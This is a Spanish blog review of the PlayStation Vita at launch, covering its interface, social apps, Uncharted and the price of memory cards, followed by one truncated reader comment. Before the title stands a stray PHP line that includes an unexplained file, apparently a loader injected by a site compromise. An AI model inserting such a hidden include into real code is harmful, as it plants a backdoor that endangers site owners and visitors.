if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); PlayStation Vita, impresiones – La Fortaleza de LeChuck

PlayStation Vita, impresiones

Ya tenemos a la venta la última apuesta de Sony en cuanto a portátiles de refiere después de su primera aventura con PSP. PlayStation Vita llega con la intención de borrar de un plumazo los fallos de su progenitora e intentar imponerse, en el duro asalto en el entretenimiento móvil, a sus rivales. Tarea nada sencilla ya que si tenemos en cuenta la hegemonía de Nintendo en este área y el avance a grandes pasos de móviles y tabletas la cosa se asemeja complicada. Para ello Sony ha dotado a Vita de una potencia inigualable, dejando a sus rivales en evidencia por mucho que nos sorprenda, aún, un juego poligonal en un móvil. Técnicamente han puesto todo en el asador, pero yo me hago una pregunta ¿no pasó exactamente lo mismo con PSP?

 

Deja Vú

Es lo que he tenido en estos últimos meses hasta que PS Vita ha caído en mis manos. En 2005, PSP apareció en Europa brindando todo un espectáculo gráfico y sonoro para lo visto hasta entonces. Todo el mundo nos apresurábamos a decir que era la portátil definitiva, que no tendría rival y que se llevaría de calle a los usuarios asombrados por lo visto en su enorme pantalla. Viendo los resultados no fue eso lo que pasó. Sony maltrató a su pequeña consola y no supo darle el tirón necesario, en forma de juegos, a esa estupenda máquina y además muy pronto se abrió totalmente a los amigos de lo ajeno y el día en el que el famoso «Downgrade» apareció una peligrosa y mortal enfermedad fue diagnosticada a PSP. Nintendo DS volvió a ganar la batalla, a pesar de contar con el mismo mal, la piratería.

 

Vive la Vita

La consola está a la venta, ya es una realidad en todo el mundo y es Sony la que tiene que cuidar que no la ocurra nada, no sólo con los llamados backups, si no con ofrecerle contenido de primera y tratando de ofrecer al usuario calidad y, sobre todo, un precio asequible.

 

Dejando de lado esto aspectos y centrándonos en el presente, PlayStation Vita es aún más de lo que habíamos probado. Todo lo visto hasta entonces era una consola ejecutando algún juego y mostrando la potencia que podía dar en sus primeros meses de vida. Pero nos faltaba por tener una en casa, tocarla, mimarla y probar todas sus características. Es ahí cuando comienza a encandilar con su encanto, desde el menú inicial, que nos recordará a un móvil, hasta las aplicaciones y su aspecto casual aparece en pantalla de forma brillante.

 

 

La pantalla inicial deja de lado el dashboard utilizado en PSP -y en PS3- y en su lugar aparece una serie de esferas que representan el acceso al juego o aplicación añadiéndose una cada vez que se instale algo nuevo, como veis similar a cualquier smartphone, incluidas las notificaciones, que aparecerán en la esquina superior derecha y se desplegarán al tocarlas con el dedo.

 

Para un primer uso podemos empezar probando la Plaza de Bienvenida donde nos habituaremos a las funciones de la consola con unos divertidos minijuegos. En ellos podremos utilizar el micrófono, las cámaras o la pantalla y el panel táctil. Dispondremos de un completo navegador, acceso a los trofeos -donde no sólo podremos consultar lo ganado en Vita, si no también en PS3– y podremos organizar una Fiesta donde juntaremos a nuestros amigos para chatear y jugar con ellos.
En el escritorio también encontraremos la aplicación Near para buscar a gente de nuestros alrededores con la consola en su poder, automáticamente buscará en un radio cercano a nuestra ubicación y nos mostrará a quien encuentre. Podremos compartir objetos de diferentes juegos y ver a que juega cada uno.

Una consola para jugar

Los extras incluidos en las plataformas actuales son de agradecer y podemos sacar una enorme función a las cualidades que nos ofrecen, pero amigos míos, una consola es para jugar y Vita destaca de sobremanera en sus primeros lanzamientos.
Principal mención hay que hacer al buque insignia de los primeros lanzamientos: Uncharted. Nathan Drake se mueve con pez en el agua en Vita. Gráficos brutales e increíblemente nítidos son mostrados en pantalla. Muchos afirman que llegan al nivel de PlayStation 3, pero es exagerar, aunque se acercan mucho.  El juego se mueve sin resentirse -los dos sticks son la hostia- y es una gozada absoluta ver en movimiento en esa «pequeña» pantalla un Uncharted como tiene que ser, nada de juegos extraños y mecánicas diferentes. En breve sacaremos análisis del juego, así que no me extenderé en sus grandes virtudes en estas lineas, pero viendo los primeros títulos de Vita y si Sony apuesta fuerte por ella y consigue grandes acuerdos con las third parties podemos presagiar un enorme futuro.

 

Conclusión

Sony ha lanzado PlayStation Vita confiando en acertar en esta ocasión, todo depende ellos como ya hemos comentado. Tienen que trabajar duro y no solo atiborrar de ports de PS3 a la portátil, esperemos que nos alegre el futuro, ese que muchos quieren ver reinar los móviles, plataformas curiosas pero totalmente injugables, si no contamos los juegos sencillos y casuals tipo Angry Birds.
La ergonomía de Vita es perfecta, se adapta de forma estupenda a cualquier agarre en la forma de jugar de cada persona, aunque el panel trasero táctil creo que quedará en mero secundario, es muy difícil no pulsarlo sin querer mientras jugamos y acabaremos por desactivarlo en todos los juegos, en FIFA es totalmente recomendado jugar sin él.
Como puntos negativos tenemos el precio de la máquina, un tanto elevado, y el valor desorbitado de algunos accesorios, las tarjetas de memoria son una autentica locura y un disparate, siendo además obligatorias ya que Sony no ha incluido almacenamiento interno en Vita y hay que ir tirando de tarjetas. Viendo el tamaño ridículo de estas tarjetas se me hace muy difícil pensar en los motivos que han llevado a Sony no incluir memoria interna y sólo veo afán de recaudación. En seguras revisiones futuras espero que Sony corrija esto.
PlayStation Vita es, sin lugar a dudas, la mejor consola en cuanto a posibilidades lanzada hasta la fecha, en su camino puede encontrar rivales, pero bien haría Sony en convertir esos rivales en amigos y aprender del vecino de enfrente, si así lo hace en la ruta de Vita sólo habrá bonitos amaneceres y nunca se encontrará con un triste anochecer.
Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

3 comentarios

  1. Muy buenas impresiones, yo cada vez que la he probado me convence más. Es la consola portátil más cómoda de coger y… oh sí! Dos sticks, y superdecentes!(Setas como dios manda, y no ese pegote rotatorio de la PSP o la 3DS) Que vale, que no serán lo mejor para meterla en el bolsillo, pero que leches, quién se mete una portátil en un bolsillo? NADIE

    A mi solo me falta más software y

Dejar un comentario